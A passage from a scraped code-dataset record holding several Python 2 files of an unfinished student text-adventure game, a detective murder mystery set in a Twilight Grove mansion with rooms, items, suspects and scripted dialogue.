a man sitting in the garden, mournfully playing a tune on his clarinet. \\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nAndres: I\\'m Dr. Andres Leal. \\n\\\nLiam: And how were you related to the victim?\\n\\\nAndres: Nicole was one of my closest friends. Sakshi, Leng, Nicole, and I have been best friends since as long as I can remember.\\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nAndres: Leng had invited all of us for the week and it was going great. It was nice to all hang out again. This morning, the maid went up to call Nicole down for breakfast and she just started screaming. We all ran up there and Nicole was lying on the floor. I went over to her and checked if there was a pulse but I couldn\\'t find one and she wasn\\'t breathing. I tried to do CPR but…we were too late.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\ngabi_2 = '\\nYou enter the lab to see Gabi typing quickly on a computer.\\n\\\nYou: Hey, Gabriella.\\n\\\nGabriella: Karolina, Liam, my two fav idiots.\\n\\\nLiam: What\\'s the good word, Gabi?\\n\\\nGabriella: First, let me say thank you for such a sweet case. I mean, Twilight Grove? Money City!\\n\\\nLiam: You\\'re telling me. The mansion is so huge, I keep getting confused which room is where.\\n\\\nYou: *clear throat* Guys, focus. \\n\\\nGabriella: Right, you\\'re right. I\\'m still waiting on the coroner to send me the full report but what I can tell you is that this tea cup contains poison.\\n\\\nLiam: What kind of poison?\\n\\\nGabriella: I don\\'t know yet. And before you ask, I am working on it and the cellphone. You\\'ll have to come back later. Why don\\'t you two go back and snoop around. Make yourselves useful and bring some more goodies!'\n\ngabi_3 = '\\nGabi: Got more? No? I\\'m not a miracle worker; bring me something I can work my magic on.'\n\n\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office \n\n#Initiators\nstart = 0 \npill_bottle = 0\ncase_solved = False \nwarning = 0\nconversation = 0\nsakshi_one = 0\nleng_one = 0\nbree_one = 0\nandres_one = 0\narrival = 0\nbedroom_arrival = 0\n \nwhile True:\n while warning == 0:\n print('\\nDisclaimer: This game is not yet completely finished.\\n\\n')\n warning +=1\n print('\\n')\n print node.name\n print node.description\n \n if node == police_office and start == 0:\n print('\\n')\n print(scene_1)\n start +=1\n \n if node == police_office and case_solved == False:\n print(chief)\n \n if node == lab and len(user_inventory.inventory) == 0:\n print(gabi)\n \n if node == lab and len(user_inventory.inventory) == 1 and conversation <=4:\n print('\\nGabi: There\\'s another piece of evidence lurking around in that house. Go forth!')\n \n if node == front_yard and arrival == 0:\n print(scene_2)\n arrival+=1\n \n if node == bedroom and bedroom_arrival == 0:\n print(scene_3)\n bedroom_arrival+=1\n \n if node == study and sakshi_one == 0:\n print(sakshi_1)\n sakshi_one+=1\n conversation+=1\n \n if node == garden and andres_one == 0:\n print(andres_1)\n andres_one+=1\n conversation+=1\n \n if node == kitchen and leng_one == 0:\n print(leng_1)\n leng_one+=1\n conversation+=1\n \n if node == living_room and bree_one == 0:\n print(bree_1)\n bree_one+=1\n conversation +=1\n \n if conversation == 4 and len(user_inventory.inventory) == 2 and node == lab:\n print(gabi_2)\n conversation +=1\n print('\\nThat\\'s all for now folks! No more sleuthing around yet. Stay tuned for the final product!')\n \n user_command = raw_input('> ')\n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n elif user_command == 'police office':\n node = police_office\n elif user_command == 'study':\n node = study\n elif user_command == 'garden':\n node = garden\n elif user_command == 'living room':\n node = living_room\n elif user_command == 'kitchen':\n node = kitchen\n elif user_command == 'bedroom':\n node = bedroom\n elif user_command == 'lab':\n node = lab\n elif user_command == 'mansion':\n node = front_yard\n elif user_command == 'examine body':\n print(examine)\n elif user_command == 'pick up paperwork' and node == study:\n paperwork.pick_up(user_inventory)\n elif user_command == 'pick up chair' and node == study:\n chair.pick_up(user_inventory)\n elif user_command == 'pick up glass' and node == study:\n water_glass.pick_up(user_inventory)\n elif user_command == 'pick up pen' and node == study:\n pen.pick_up(user_inventory)\n elif user_command == 'pick up cell phone' and node == bedroom:\n cell_phone.pick_up(user_inventory)\n elif user_command == 'look under bed' and node == bedroom:\n print(phone)\n elif user_command == 'pick up teacup' and node == bedroom:\n teacup.pick_up(user_inventory)\n print(cup)\n elif user_command == 'pick up morphine capsules' and node == bedroom:\n morphine_capsules.pick_up(user_inventory)\n elif user_command == 'check trash' and node == front_yard:\n print \n elif user_command == 'pick up pill bottle' and node == front_yard:\n pill_bottle.pick_up(user_inventory)\n pill_bottle+=1\n elif user_command == 'pick up vase' and node == living_room:\n vase_2.pick_up(user_inventory)\n elif user_command == 'pick up pen' and node == living_room:\n pen_2.pick_up(user_inventory)\n elif user_command == 'pick up desk' and node == living_room:\n desk.pick_up(user_inventory)\n elif user_command == 'pick up wrapper' and node == garden:\n wrapper.pick_up(user_inventory)\n elif user_command == 'pick up clarinet' and node == garden:\n clarinet.pick_up(user_inventory)\n elif user_command == 'pick up bench' and node == garden:\n bench.pick_up(user_inventory)\n elif user_command == 'pick up news clipping' and node == garden:\n news_clipping.pick_up(user_inventory)\n \n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n'''\n#Setting up variables to be called on later\nlife = 5\nbank = [\"zero one twenty nine\"]\nword = random.choice(bank)\nletters_left = list(set(word)) #creating a list of letters in word\nif ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \nuser_guesses = [] #More variables\nwrong_answers = 0\nhidden_phrase = []\nfoo = list(word) \nprint (\"You have five chances right now.\")\nwhile life > 0: #The dreaded while loop\n \n for letter in word: \n hidden_phrase = [] \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'),\n \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n gaby.say()\n '''\n"
},
{
"alpha_fraction": 0.643576443195343,
"alphanum_fraction": 0.6454073786735535,
"avg_line_length": 29.064220428466797,
"blob_id": "47ba1ee59e973f7c3e6b44147624f191f06a6f92",
"content_id": "d802c9018ca1945ee0ced46ea8acf2ec11f010cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3277,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 109,
"path": "/CarolineRooms.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "class Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Glass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office "
},
{
"alpha_fraction": 0.662409782409668,
"alphanum_fraction": 0.664075493812561,
"avg_line_length": 39.022220611572266,
"blob_id": "ca1f07ff79f4614ea787f8faaa372a2f400cf8dd",
"content_id": "0cd0ddf1e876cda609a3b0f79d40e4139fd427a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 45,
"path": "/Caroline Rooms.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "class Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office "
},
{
"alpha_fraction": 0.5449344515800476,
"alphanum_fraction": 0.5510131120681763,
"avg_line_length": 31.523256301879883,
"blob_id": "91a18a4ab885ca2c0756712e3061f19b6f5c41e4",
"content_id": "516a5d65baf702a31fb30ba6f346cc66fc7ec952",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8390,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 258,
"path": "/CS10-SumanjitGill-Caroline.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\n\n#-------------------------------------------------------------------------------\n \nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\naxe = Item('Axe', 'Pointy')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n \n#Caroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', '', 'You are her... So wherever you are that\\'s where she is.')\n#Liam = Character('Liam','Liam Youngblood', 23, 'Alive', '', 'He\\'s always by your side.')\n#Gabriela = Character('Gabi','Gabriela Solis',18, 'Alive', '', 'She\\'s found in the lab at the police office.')\n#Andres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', '', 'He\\'s found in the garden.')\n#Bree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\n#Nicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\n#Liev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\n#Sakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\n#Leng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\nclass Dialogue:\n def __init__(self, dialogue):\n self.dialogue = dialogue\n \n def say(self,char):\n print char.name+':','\"'+self.dialogue+'\"'\n \nhello = Dialogue('Hello')\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n \n def see_item(self, cosa):\n print cosa.description\n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This office.', None, None, None)\nstudy = Room('The Study', 'This study.', None, None, None)\ngarden = Room('Garden', 'This garden.', None, None, None)\nliving_room = Room('Living Room', 'This room.', None, None, None)\nkitchen = Room('Kitchen', 'This kitchen.', None, None, None)\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene.', None, None, None)\nlab = Room('Gabi\\'s Room', 'This lab.', None, None, None)\nfront_yard = Room('Front Yard', 'This front yard.', None, None, None)\n\nglobal node \nnode = living_room \n''' \nwhile True:\n print node.name\n print node.description\n user_command = raw_input('> ')\n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n elif user_command == 'police office':\n node = police_office\n elif user_command == 'study':\n node = study\n elif user_command == 'garden':\n node = garden\n elif user_command == 'living room':\n node = living_room\n elif user_command == 'kitchen':\n node = kitchen\n elif user_command == 'bedroom':\n node = bedroom\n elif user_command == 'lab':\n node = lab\n elif user_command == 'front yard':\n node = front_yard\n '''\nbathroom = Room('Bathroom', 'This is where you shower and excrete your junk.', axe, None, None)\n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n\n'''while True:\n user_response = raw_input('> ')\n if user_response in ['q','quit','exit']:\n sys.exit(0)\n '''\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n'''\n#Setting up variables to be called on later\nlife = 5\nbank = [\"zero one twenty nine\"]\nword = random.choice(bank)\n\nletters_left = list(set(word)) #creating a list of letters in word\nif ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n\nuser_guesses = [] #More variables\nwrong_answers = 0\nhidden_phrase = []\nfoo = list(word) \n\nprint (\"You have five chances right now.\")\n\nwhile life > 0: #The dreaded while loop\n \n\n\n for letter in word: \n hidden_phrase = [] \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'),\n \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n gaby.say()\n '''"
},
{
"alpha_fraction": 0.5985155701637268,
"alphanum_fraction": 0.6036677360534668,
"avg_line_length": 37.47105026245117,
"blob_id": "1945b79a9b3e56af501d48bde32a828b82426139",
"content_id": "bf8fe0d7528bc920308ec1edd2ee5a70c5f25a1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 39235,
"license_type": "no_license",
"max_line_length": 608,
"num_lines": 1019,
"path": "/Caroline GUIIII.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#WARNING: GAME UNFINISHED\n#More involvement in game :) ~ puzzles and more functions to search the rooms\n#from _____ import *\n\nimport sys\nimport random\nimport time\nimport pickle\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\nhang = Inventory()\n\n#-------------------------------------------------------------------------------\n\nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\npic = ''\n\npic_2 = ''\n\npic_3 = ''\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Gllass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n'''\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n '''\n \nCaroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', 'Caroline is a dedicated police officer and takes her tasks seriously.', 'You are her... So wherever you are that\\'s where she is.')\nLiam = Character('Liam','Liam Youngblood', 23, 'Alive', 'Liam is your fellow officer and is very charasmatic and likes to make light of situations to keep your spirits up.', 'He\\'s always by your side.')\nGabriela = Character('Gabi','Gabriella Solis',18, 'Alive', 'Gabi is a technology and science geek and loves to invent new things; she\\'s the scientific aide to your father\\'s police department.', 'She\\'s found in the lab at the police office.')\nAndres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', 'Andres is a calm doctor who loves to play his clarinet.', 'He\\'s found in the garden.')\nBree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\nNicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\nLiev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\nSakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\nLeng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\n#class Dialogue:\n # def __init__(self, dialogue):\n # self.dialogue = dialogue\n # \n #def say(self,char):\n # print char.name+':','\"'+self.dialogue+'\"'\n \nscene_1 = 'Chief: \"Chief Ativa speaking. Yes, sir. Yes, sir. I understand. Yes, sir, I will make sure it is taken care of.\"\\n\\\n\\n\\\nThe Chief hangs up the phone and looks at a picture with him and his daughter (you) on the day she (you) graduated from the police academy.\\n\\\n\\n\\\nYou are sitting outside at your desk with paperwork, you partner Liam talking your ear off.\\n\\\n\\n\\\nLiam: \"And that\\'s when I said, I don\\'t care how much money he has. It\\'s all about how his --\" \\n\\\n\\n\\\nChief: \"Ativa and Youngblood, get in here.\"\\n\\\n\\n\\\nLiam: \"Pants. And yes, sir! Your dad seems grumpy.\"\\n\\\n\\n\\\nYou: \"Probably saw your face too early in the morning.\"\\n\\\n\\n\\\nLiam: \"Ouch, that hurts.\"\\n\\\n\\n\\\nYou both enter the Chief\\'s office.\"\\n\\\n\\n\\\nChief: \"There\\'s been a highly suspicious death.\"\\n\\\n\\n\\\nLiam: \"Naturally, we are the homicide division.\"\\n\\\n\\n\\\n\\n\\\nYou shoot Liam a look, fighting the urge to roll your eyes, which the Chief does do.\\n\\\n\\n\\\nChief: \"Youngblood, I don\\'t want to hear another word until I am done briefing you. There\\'s been a death in Twilight Grove.\"\\n\\\n\\n\\\nLiam whistles, getting another irritated look from the Chief. You know what Liam meant. Twilight Grove is a very affluent neighborhood.\\n\\\n\\n\\\nChief: \"As you can understand, it\\'s a high profile case and the Mayor is concerned. The crime scene is quite isolated so it has been kept quiet. \\n\\\nI want both of you to head the case and wrap it up. Come talk to me as soon as you\\'ve solved it.\"\\n\\\n\\n\\\nYou exit the Chief\\'s office with Liam.\\n'\n\nchief = '\\nChief: \"What are you waiting for? Finish up the case!\"'\n\ngabi = '\\nGabi: \"No evidence, no entry, no Gabi. Come back later you lovable bozos.\"'\n\nscene_2 = '\\nLiam: \"That is one huge—\"\\n\\\n\\n\\\nYou: \"According to the case files, it belongs to a guy named Leng Li. He\\'s a renowned chef.\"\\n\\\n\\n\\\nLiam: \"If he\\'s so rich, why can\\'t he buy a trash can? There\\'s so much junk around here.\"\\n\\\n\\n\\\nYou: \"Oh, right, the garbage strike. Did you read about how --\" \\n\\\n\\n\\\nLiam: \"No, I didn\\'t. Well, I can take solace in the fact that my house is cleaner than a rich guy\\'s.\" \\n\\\n\\n\\\nYou: \"And there\\'s no dead body in yours. I hope.\"'\n\nscene_3 = '\\nLiam: \"Pretty girl. At least she didn\\'t die in the \"living\" room, eh?\"\\n\\\n\\n\\\nYou: \"This is Nicole Laurenya, a rich heiress well-known for her social life.\"\\n\\\n\\n\\\nLiam: \"Just going to ignore my joke?\"\\n\\\n\\n\\\nYou: \"Yup.\"'\n\nexamine = '\\nYou: \"I don\\'t see any signs of trauma and I hardly think it\\'s natural causes. It could be poison…\"\\n\\\n\\n\\\nLiam: \"The killer\\'s probably a woman then. Poison is usually used by women.\"\\n\\\n\\n\\\nYou: \"Didn\\'t you say you would kill someone with cyanide if you wanted to make a clean getaway?\"\\n\\\n\\n\\\nLiam: \"I\\'m special. Anyways, let\\'s let the coroner take a look. Gabriella will tell us more.\"'\n\ncup = '\\nYou: \"Gabriella can also tell us more about this.\"\\n\\\n\\n\\\nLiam: \"Now I\\'m thirsty.\"\\n\\\n\\n\\\nYou: \"You want a sip?\"\\n\\\n\\n\\\nLiam: \"Ha, ha, hilarious.\"'\n\nphone = 'You: \"Found something.\"\\n\\\n\\n\\\nLiam: \"The victim\\'s cell phone. Nice.\"\\n\\\n\\n\\\nYou: \"It has a passcode but I\\'m sure we can figure it out later.\"'\n\nsakshi_1 = 'You enter the study to see a woman sitting at the desk and writing with a fancy pen, her expression clearly upset. \\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nWoman: \"I\\'m Sakshi Goenka.\"\\n\\\n\\n\\\nLiam: \"The business tycoon?\"\\n\\\n\\n\\\nSakshi: \"The very same.\"\\n\\\n\\n\\\nLiam: \"And how were you 